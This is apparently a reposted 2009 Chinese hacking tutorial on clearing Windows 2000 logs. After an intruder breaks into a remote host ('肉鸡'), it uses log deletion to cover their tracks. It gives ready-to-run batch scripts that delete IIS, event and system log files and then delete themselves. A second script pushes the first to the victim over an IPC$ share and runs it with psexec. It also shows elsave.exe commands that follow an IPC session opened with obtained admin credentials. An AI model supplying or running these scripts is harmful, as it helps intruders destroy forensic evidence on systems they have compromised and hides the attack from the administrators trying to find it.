彻底清除本地和远程系统日志文件
来源:asp之家 发布时间:2009-12-05 19:14:00
什么是日志文件?它是一些文件系统集合,依靠建立起的各种数据的日志文件而存在。在任何系统发生崩溃或需要重新启动时,数据就遵从日志文件中的信息记录原封不动进行恢复。日志对于系统安全的作用是显而易见的,无论是网络管理员还是 黑客都非常重视日志,一个有经验的管理员往往能够迅速通过日志了解到系统的安全性能,而一个聪明的黑客会在入侵成功后迅速清除掉对自己不利的日志。无论是攻还是防,日志的重要性由此可见。下面我们就来简单讨论一下日志文件的清除方法。
一、日志文件的位置
Windows 2000的系统日志文件有应用程序日志,安全日志、系统日志、DNS服务器日志等等,应用程序日志、安全日志、系统日志、DNS日志默认位置:%systemroot%system32config。
安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
有的管理员很可能将这些日志重定位(所以日志可能不在上面那些位置),其中EVENTLOG下面有很多的子表,在里面可查到以上日志的定位目录。
二、清除自己电脑中的日志
如果你要清除自己电脑中的日志,可以用管理员的身份来登录Windows,然后在“控制面板”中进入“管理工具”,再双击里面的“事件查看器”。打开后我们就可以在这里清除日志文件了,里面有应用程序、安全和系统日志文件。举个例子,比方说你想清除安全日志,可以右键点击“安全日志”,在弹出的菜单中选择“属性”。接下来在弹出的对话框中,点击下面“清除日志”按钮就可以清除了,如果你想以后再来清除这些日志的话,可以将“按需要改写尺寸”,这样就可以在达到最大日志尺寸时进行改写事件了,不会提示你清除日志。
三、清除远程主机上的日志
大多数情况下,IIS的日志会忠实地记录它接收到的任何请求(也有特殊的不被IIS记录的攻击),一个优秀的系统管理员会利用这点来发现入侵的企图,保护自己的系统。所以如果你是黑客,入侵系统成功后第一件事便是清除日志,擦去自己的形迹,这时可以用以下两个办法:一是自己编写批处理文件来解决,编写一个能清除日志的批处理非常简单,方法是:新建一个具有如下内容的批处理文件:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把上面的内容保存为del.bat备用。在上面的代码中echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,另外del命令大家一定清楚吧?它是删除文件命令。
接下来再新建一个批处理文件,内容如下:
@copy del.bat \%1c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉鸡上运行del.bat,清除日志文件……OK
保存为clean.bat即可,假设已经与肉鸡进行了Ipc连接,然后在CMD下输入:clean.bat 肉鸡IP,即可清除肉鸡上的日志文件。
清除日志的另外一个方法是借助第三方软件,如著名黑客软件流光的开发者黑客小榕的elsave.exe,就是是一款可以远程清除系统日志、应用程序日志、安全日志的软件,大家可以在网上下载到。elsave.exe使用起来很简单,首先利用获得的管理员账号与对方建立IPC会话:net use \ip pass /user: user,然后在命令行下执行如下命令:elsave -s \ip -l application -C,这样就删除了安全日志。
猜你喜欢
- 当制作dedecms模板的head.htm时页面显示正常当制作index.htm模板时发现在index.htm输入中文时会出现乱码之前没有遇
- 今天给大家讲一下如何建立社区的核心用户。说这个主题之前,想先向大家简单说一下什么是核心用户。首先,核心用户要符合两个生理特征。一是脸部肌肉发
- Windows下的WWW服务器以其架设方便、操作简单赢得了很多人的青睐,下面将以Windows Server 2003为例,介绍如何配置一个
- 在搜索实践中还会涌现出新的问题,产生新的关键词选择原则及更多的经验技巧。学会对关键词分析与处理的常用知识,也会加深我们对搜索引擎的理解,能让
- 做一个中国站长,如果以下50个问题,你不知道,你会很吃亏的,也有可能你是一个倒霉的站长。五十个问题,有四十个你能做到,那你才是及格的站长,这
- 本文分步介绍如何使用 Internet 信息服务 (IIS) 5.0 授予对 Web 内容的 Web 服务器权限。您可以对服务器上的特定网站
- dede5.3的列表页每页的标题都相同,这样会让Google的搜索引擎认为是重复的页面,影响收录,我们可以为列表加上第几页,这个没个页面就是
- 1、问:当在浏览器中输入“http://IP地址”和输入“http://IP地址/”有什么差别吗?它们会做什么?答:没有差别!前一种格式浏览
- 注意,这里我们指的是环境是IIS7,并不是以前文章介绍过的“解决IIS下UTF-8文件报错乱码的问题”!安装Win Vista后,默认使用的
- 目前中国分类信息网的竞争可以说已经到了白炽化成程.口啤网目前来说还是处于导先地位,当然我今天不来批论这些网站的盈利情况.今天我们来看一下同城
- 万事皆有度,都有其发展和延续的规律,不可太过,这就是度,就是尺度,那么在搜索引擎优化技术中,如何合理的把握这个度,来避免过度优化呢?掌握合理
- 使用黑帽SEO的人,心里或多或少都存在一个假设,那就是搜索引擎没自己聪明。在前几天的搜索引擎怎样判断垃圾留言这个帖子里,就有读者认为我把搜索
- D.配置postfix.1.主要是main.cf的配置。virtual_alias_maps=mysql:/etc/postfix/mysq
- 理论上讲无效点击是不可能完全避免的,因为这取决于用户的行为和Google Adsense的判断。一方面用户的自发点击是站长无法控制的,另外G
- Exchange 2007的变化包括:采用统一的收件箱,支持语音邮件,并改进了Outlook客户端电子邮件软件。①立即升级的公司廖廖无几。高
- 10月15日,微软在中国市场正式推出最新的手机操作系统Windows Mobile 6.5。全新的手机界面、更人性的用户体验,得到了大批手机
- 有Godaddy用户问该如何更改域名的解析服务器地址,其实绝大多数的域名注册商,会提供域名的控制面板,通过控制面板,您能修改域名的域名解析服
- 在2006年6月的美国《连线》杂志上,该杂志的记者Jeff Howe(杰夫.豪)首次推出了众包(Crowdsourcing)的概念,Howe
- 转眼已入而立之年,虽没有大成绩,但是因为摸爬滚打而学得的经验小有一些,写了一些自己的心得,希望能够分享给大家,也希望能够帮助站长规避掉一些发
- LoveBlogEarn 同学在博客留言,说到域名转发是不是能提高PR?因为sinoblog.net这个域名就是转发到sinoblog.or